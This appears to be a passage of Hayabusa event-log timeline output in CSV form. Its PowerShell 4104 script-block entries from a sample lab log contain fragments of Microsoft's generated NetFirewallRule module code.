'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 
+00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} 
